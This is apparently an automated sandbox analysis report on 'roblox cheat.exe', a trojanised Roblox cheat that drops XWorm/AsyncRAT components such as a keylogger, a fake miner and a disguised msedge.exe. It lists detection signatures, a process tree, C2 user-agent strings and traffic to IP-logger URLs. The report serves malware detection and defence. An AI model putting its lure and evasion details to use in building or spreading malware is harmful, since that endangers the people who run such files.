Windows Analysis Report
roblox cheat.exe

Overview

General Information

Sample name: roblox cheat.exe
Analysis ID: 1484380
MD5: 6b94734feac8edb9f925385163ad59c9
SHA1: 3ec9cc36f11ce7836e86089631ad790e7c8fe3cc
SHA256: 62d6f204244bbb976a155aa7750874a56db925c8531d76dce6bf5560440cb63c
Tags: exe

Detection

XWorm
Score: 90
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • roblox cheat.exe (PID: 4840 cmdline: "C:\Users\user\Desktop\roblox cheat.exe" MD5: 6B94734FEAC8EDB9F925385163AD59C9)
    • robloxPX1instaler.exe (PID: 3300 cmdline: "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" MD5: 27469372591B14FF1C57654FACB5E020)
    • cheatinstaler cheatinstalerF6R54T.exe (PID: 816 cmdline: "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" MD5: FC411F4D9F4DBA5104CB1549153A8684)
      • cmd.exe (PID: 6728 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7376 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chrome.exe (PID: 7488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 7740 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2184,i,14828535627695779647,3084874413555431357,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7aa6:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\Keyloger.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\Keyloger.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xf0e7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf184:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf299:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xdb4c:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\ msedge.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8cc8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8d65:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8e7a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8976:$cnc4: POST / HTTP/1.1
Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 816 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

            System Summary

            Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe, ParentCommandLine: "C:\Users\user\Desktop\roblox cheat.exe", ParentImage: C:\Users\user\Desktop\roblox cheat.exe, ParentProcessId: 4840, ParentProcessName: roblox cheat.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" , ProcessId: 3300, ProcessName: robloxPX1instaler.exe
            No Snort rule has matched
            Timestamp: 2024-07-30T00:47:04.044403+0200
            SID: 2022930
            Source Port: 443
            Destination Port: 49743
            Protocol: TCP
            Classtype: A Network Trojan was detected

            Timestamp: 2024-07-30T00:46:25.027588+0200
            SID: 2022930
            Source Port: 443
            Destination Port: 49729
            Protocol: TCP
            Classtype: A Network Trojan was detected

            AV Detection

            Source: roblox cheat.exe | Avira: detected
            Source: https://2no.co/24RXx6H | Avira URL Cloud: Label: malware
            Source: https://2no.co/ | Avira URL Cloud: Label: malware
            Source: https://2no.co/redirect-2 | Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | Avira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe | Avira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe | Avira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe | ReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | ReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe | ReversingLabs: Detection: 81%
            Source: roblox cheat.exe | ReversingLabs: Detection: 60%
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe | Joe Sandbox ML: detected
            Source: roblox cheat.exe | Joe Sandbox ML: detected
            Source: roblox cheat.exe, 00000000.00000000.1243509232.00000000007A2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- | memstr_13cdbabc-0
            Source: roblox cheat.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknown | HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49729 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49737 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49742 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49743 version: TLS 1.2
            Source: roblox cheat.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: \rat\BitJoiner\payload\obj\Debug\payload.pdb source: roblox cheat.exe
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: roblox cheat.exe, cheatinstaler cheatinstalerF6R54T.exe.0.dr
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: robloxPX1instaler.exe, 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmp, robloxPX1instaler.exe, 00000002.00000000.1248829949.0000000000B58000.00000002.00000001.01000000.00000006.sdmp
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16DB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16DB190
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16C40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16C40BC
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16EFCA0 FindFirstFileExA,3_2_00007FF6C16EFCA0
            Source: Joe Sandbox View | IP Address: 88.212.201.198
            Source: Joe Sandbox View | IP Address: 18.239.18.53
            Source: Joe Sandbox View | IP Address: 172.67.132.113
            Source: Joe Sandbox View | IP Address: 239.255.255.250
            Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknown | TCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknown | TCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknown | TCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: global trafficHTTP traffic detected: GET /24RXx6 HTTP/1.1Host: 2no.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /redirect/handshake.png HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1Host: counter.yadro.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6; VID=2DNPIG0nbdur1cg1k-0018Z0
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uFDCTh8d52ccRcZ&MD=g9KFUel5 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uFDCTh8d52ccRcZ&MD=g9KFUel5 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global traffic | DNS traffic detected: DNS query: ecsv2.roblox.com
            Source: global traffic | DNS traffic detected: DNS query: clientsettingscdn.roblox.com
            Source: global traffic | DNS traffic detected: DNS query: 2no.co
            Source: global traffic | DNS traffic detected: DNS query: cdn.iplogger.org
            Source: global traffic | DNS traffic detected: DNS query: counter.yadro.ru
            Source: global traffic | DNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global traffic | DNS traffic detected: DNS query: www.google.com
            Source: global traffic | DNS traffic detected: DNS query: client-telemetry.roblox.com
            Source: unknownHTTP traffic detected: POST /report/v4?s=u4EPwlIfu5u%2FXXj0kRaPdkPJwH6VqTzmIykH2X9%2Fyuj1FCpzRnd4kOm6Jqn1GDDAN13dvkMlZJ9E0adkpSW7TqU2KldHQHU11YPPbJtFEHxZlyRQ0Vh6q2i%2Fu8W3Miwh0Hqm HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 424Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 29 Jul 2024 22:46:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr | String found in binary or memory: http://bit.ly/1eMQ42U
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447390699.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447677703.0000000003F7F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003F92000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448098395.0000000003F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001BE4000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448009865.0000000001BF1000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1453591906.0000000001C18000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447490712.0000000001C15000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001BEF000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49729 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49737 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49742 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49743 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: BitCoin_miner.exe.3.dr, XLogger.cs .Net Code: KeyboardLayout
            Source: msedge.exe.3.dr, XLogger.cs .Net Code: KeyboardLayout

            System Summary

            Source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16BC2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16BC2F0
            Source: roblox cheat.exe, 00000000.00000000.1243509232.0000000000C80000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000000.1244210855.0000000000DB4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamepayload.exe4 vs roblox cheat.exe
